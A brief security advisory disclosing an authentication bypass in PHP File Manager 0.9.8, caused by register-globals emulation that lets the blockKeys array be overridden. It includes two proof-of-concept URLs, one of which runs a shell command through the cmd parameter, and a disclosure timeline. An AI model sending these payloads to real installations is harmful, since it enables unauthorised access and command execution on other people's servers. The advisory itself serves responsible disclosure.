PHP File Manager 0.9.8 ( is vulnerable to authentication bypass due to insecure implementation of register globals emulation. An attacker is able to override the blockKeys array and thus build a valid session and access all the protected functionality (including execution of shell commands) without actual knowledge of the password set. PoC URLs: http://host/phpfm.php?blockKeys[]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=5 http://host/phpfm.php?blockKeys[]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=ls%20-la Timeline: 2016-01-04: Original report to the developer 2016-01-04: CVE ID requested from MITRE 2016-01-11: Report resent to the developer 2016-01-18: Notification sent to the developer about disclosing the vulnerability on 25th of January 2016-01-18: Disclosure Imre Rad Search-Lab Ltd.